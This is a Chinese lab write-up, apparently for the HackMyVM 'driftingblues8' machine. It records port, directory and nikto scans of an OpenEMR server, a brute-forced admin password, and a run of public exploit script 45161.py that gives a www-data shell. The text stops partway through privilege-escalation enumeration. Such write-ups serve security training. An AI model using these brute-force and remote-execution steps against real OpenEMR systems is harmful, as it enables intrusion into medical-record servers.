{"id":544,"date":"2024-04-13T15:34:40","date_gmt":"2024-04-13T07:34:40","guid":{"rendered":"http:\/\/162.14.82.114\/?p=544"},"modified":"2024-04-13T15:34:40","modified_gmt":"2024-04-13T07:34:40","slug":"hmv-_-driftingblues8","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/544\/04\/13\/2024\/","title":{"rendered":"hmv[-_-]driftingblues8"},"content":{"rendered":"<h1>driftingblues8<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533062.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533062.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413142310719\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533064.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533064.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413142455026\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.7 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.7:80\n\nPORT   STATE SERVICE REASON  VERSION\n80\/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-favicon: Unknown favicon MD5: 6CE8D3334381134EB0A89D8FECE6EEB2\n| http-title: OpenEMR Login\n|_Requested resource was interface\/login\/login.php?site=default\n|_http-server-header: Apache\/2.4.38 (Debian)<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.7 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">\/.php                 (Status: 403) [Size: 276]\n\/index.php            (Status: 302) [Size: 0] [--&gt; interface\/login\/login.php?site=default]\n\/images               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/images\/]\n\/templates            (Status: 301) [Size: 314] [--&gt; http:\/\/172.20.10.7\/templates\/]\n\/services             (Status: 301) [Size: 313] [--&gt; http:\/\/172.20.10.7\/services\/]\n\/modules              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.7\/modules\/]\n\/common               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/common\/]\n\/library              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.7\/library\/]\n\/public               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/public\/]\n\/version.php          (Status: 200) [Size: 0]\n\/admin.php            (Status: 200) [Size: 937]\n\/portal               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/portal\/]\n\/tests                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.7\/tests\/]\n\/sites                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.7\/sites\/]\n\/custom               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/custom\/]\n\/contrib              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.7\/contrib\/]\n\/interface            (Status: 301) [Size: 314] [--&gt; http:\/\/172.20.10.7\/interface\/]\n\/vendor               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/vendor\/]\n\/config               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.7\/config\/]\n\/setup.php            (Status: 200) [Size: 1214]\n\/Documentation        (Status: 301) [Size: 318] [--&gt; http:\/\/172.20.10.7\/Documentation\/]\n\/sql                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.7\/sql\/]\n\/controller.php       (Status: 200) [Size: 37]\n\/LICENSE              (Status: 200) [Size: 35147]\n\/ci                   (Status: 301) [Size: 307] [--&gt; http:\/\/172.20.10.7\/ci\/]\n\/cloud                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.7\/cloud\/]\n\/ccr                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.7\/ccr\/]\n\/patients             (Status: 301) [Size: 313] [--&gt; http:\/\/172.20.10.7\/patients\/]\n\/repositories         (Status: 301) [Size: 317] [--&gt; http:\/\/172.20.10.7\/repositories\/]\n\/myportal             (Status: 301) [Size: 313] [--&gt; http:\/\/172.20.10.7\/myportal\/]\n\/entities             (Status: 301) [Size: 313] [--&gt; http:\/\/172.20.10.7\/entities\/]\n\/.php                 (Status: 403) [Size: 276]\n\/wordlist.txt         (Status: 200) [Size: 14394]\n\/controllers          (Status: 301) [Size: 316] [--&gt; http:\/\/172.20.10.7\/controllers\/]\n\/server-status        (Status: 403) [Size: 276]<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.7<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.7\n+ Target Hostname:    172.20.10.7\n+ Target Port:        80\n+ Start Time:         2024-04-13 02:26:39 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.38 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ Root page \/ redirects to: interface\/login\/login.php?site=default\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is &quot;127.0.1.1&quot;. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ Apache\/2.4.38 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/config\/: Directory indexing found.\n+ \/config\/: Configuration information may be available remotely.\n+ \/admin.php?en_log_id=0&amp;action=config: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2006-5412\n+ \/admin.php?en_log_id=0&amp;action=users: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2006-5412\n+ \/admin.php: This might be interesting.\n+ \/library\/: Directory indexing found.\n+ \/library\/: This might be interesting.\n+ \/public\/: Directory indexing found.\n+ \/public\/: This might be interesting.\n+ \/services\/: Directory indexing found.\n+ \/sql\/: Directory indexing found.\n+ \/tests\/: Directory indexing found.\n+ \/tests\/: This might be interesting.\n+ \/images\/: Directory indexing found.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/ci\/: Directory indexing found.\n+ \/ci\/: This might be interesting: potential country code (C\u00d4te D&#039;ivoire).\n+ \/interface\/billing\/billing_process.php?srcdir=http:\/\/blog.cirt.net\/rfiinc.txt?: Cookie OpenEMR created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/sites\/: Directory indexing found.\n+ \/portal\/: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/composer.lock: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ \/.gitignore: .gitignore file found. It is possible to grasp the directory structure.\n+ \/README.md: Readme Found.\n+ 8102 requests: 0 error(s) and 27 item(s) reported on remote host\n+ End Time:           2024-04-13 02:27:07 (GMT-4) (28 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533065.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533065.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413142852045\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.7\/\/wordlist.txt<\/code><\/pre>\n<p>\u7ed9\u4e86\u4e00\u4e2a\u5b57\u5178\uff0c\u5148\u7ed9\u4ed6\u4fdd\u5b58\u4e00\u4e0b\uff0c\u540e\u9762\u4f30\u8ba1\u7206\u7834\u8981\u7528\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.7\/admin.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533066.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533066.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413143116951\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.7\/custom\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533067.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533067.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413143309914\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5\u7206\u7834<\/h3>\n<p>\u6293\u4e2a\u5305\u5148\uff1a\uff08\u600e\u4e48\u611f\u89c9\u6709\u70b9\u8033\u719f\uff0c\u5b59\u5427\u7528\u6237\u7684\u8b66\u89c9\uff09<\/p>\n<pre><code class=\"language-bash\">POST \/interface\/main\/main_screen.php?auth=login&amp;site=default HTTP\/1.1\nHost: 172.20.10.7\nContent-Length: 102\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/172.20.10.7\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/172.20.10.7\/interface\/login\/login.php?site=default\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nnew_login_session_management=1&amp;authProvider=Default&amp;authUser=admin&amp;clearPass=password&amp;languageChoice=1<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\uff0c\u672c\u6765\u6211\u5c1d\u8bd5hydra\u7684\uff0c\u4f46\u662f\u6ca1\u6709\u8c03\u51fa\u6765\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533068.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533068.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413144937314\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533069.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533069.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145052311\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u5bc6\u7801\uff01<\/p>\n<pre><code class=\"language-apl\">admin\n.:.yarrak.:.31<\/code><\/pre>\n<p>\u7136\u540e\u8fdb\u6765\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533070.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533070.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145153212\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u6709\u65e0\u4e0a\u4f20\u5165\u53e3\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533071.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533071.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145256040\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533072.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533072.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145314383\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u597d\u50cf\u4e0d\u592a\u9614\u4ee5\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533073.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533073.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145527419\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u641c\u96c6\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff0c\u4e4b\u524d\u654f\u611f\u76ee\u5f55\u770b\u5230\u5176\u7248\u672c\u4e3a\uff1a<code>5.0.1(3)<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533074.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533074.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413145650948\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues8]\n\u2514\u2500$ python2 45161.py -u admin -p .:.yarrak.:.31 -c whoami http:\/\/172.20.10.7\n .---.  ,---.  ,---.  .-. .-.,---.          ,---.    \n\/ .-. ) | .-.\\ | .-&#039;  |  \\| || .-&#039;  |\\    \/|| .-.\\   \n| | |(_)| |-&#039; )| `-.  |   | || `-.  |(\\  \/ || `-&#039;\/   \n| | | | | |--&#039; | .-&#039;  | |\\  || .-&#039;  (_)\\\/  ||   (    \n\\ `-&#039; \/ | |    |  `--.| | |)||  `--.| \\  \/ || |\\ \\   \n )---&#039;  \/(     \/( __.&#039;\/(  (_)\/( __.&#039;| |\\\/| ||_| \\)\\  \n(_)    (__)   (__)   (__)   (__)    &#039;-&#039;  &#039;-&#039;    (__) \n\n   ={   P R O J E C T    I N S E C U R I T Y   }=    \n\n         Twitter : @Insecurity                       \n         Site    : insecurity.sh                     \n\n[$] Authenticating with admin:.:.yarrak.:.31\n[$] Injecting payload\n[$] Payload executed<\/code><\/pre>\n<p>\u989d\uff0c\u4e0d\u77e5\u9053\u6267\u884c\u6210\u529f\u6ca1\u6709\u554a\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\u8bd5\u8bd5\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533075.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533075.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413150429744\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533076.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131533076.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413150438087\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main$ sudo -l\nbash: sudo: command not found\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main$ ls -la\ntotal 252\ndrwxrwxrwx 11 www-data www-data  4096 May 28  2018 .\ndrwxrwxrwx 32 www-data www-data  4096 May 28  2018 ..\n-rwxrwxrwx  1 www-data www-data  6765 May 28  2018 about_page.php\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 authorizations\n-rwxrwxrwx  1 www-data www-data 27999 May 28  2018 backup.php\n-rwxrwxrwx  1 www-data www-data  2179 May 28  2018 backuplog.php\n-rwxrwxrwx  1 www-data www-data  1992 May 28  2018 backuplog.sh\n-rwxrwxrwx  1 www-data www-data   179 May 28  2018 blank.php\ndrwxrwxrwx  4 www-data www-data  4096 May 28  2018 calendar\n-rwxrwxrwx  1 www-data www-data  2119 May 28  2018 daemon_frame.php\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 dated_reminders\n-rwxrwxrwx  1 www-data www-data 10495 May 28  2018 display_documents.php\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 exceptions\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 finder\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 holidays\n-rwxrwxrwx  1 www-data www-data 26027 May 28  2018 ippf_export.php\n-rwxrwxrwx  1 www-data www-data 84686 May 28  2018 left_nav.php\n-rwxrwxrwx  1 www-data www-data  3349 May 28  2018 main_info.php\n-rwxrwxrwx  1 www-data www-data  9783 May 28  2018 main_screen.php\n-rwxrwxrwx  1 www-data www-data  8399 May 28  2018 main_title.php\ndrwxrwxrwx  4 www-data www-data  4096 May 28  2018 messages\ndrwxrwxrwx  2 www-data www-data  4096 May 28  2018 onotes\n-rwxrwxrwx  1 www-data www-data  3230 May 28  2018 pwd_expires_alert.php\ndrwxrwxrwx  5 www-data www-data  4096 May 28  2018 tabs\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main$ messages\/\nbash: messages\/: Is a directory\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main$ cd messages\/\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main\/messages$ ls\ncss  js  lab_results_messages.php  messages.php  print_postcards.php  save.php\n(remote) www-data@driftingblues:\/var\/www\/html\/interface\/main\/messages$ cd ..\/..\/..\/\n(remote) www-data@driftingblues:\/var\/www\/html$ ls -la\ntotal 668\ndrwxrwxrwx 31 www-data www-data   4096 Apr 25  2021 .\ndrwxr-xr-x  3 root     root       4096 Apr 25  2021 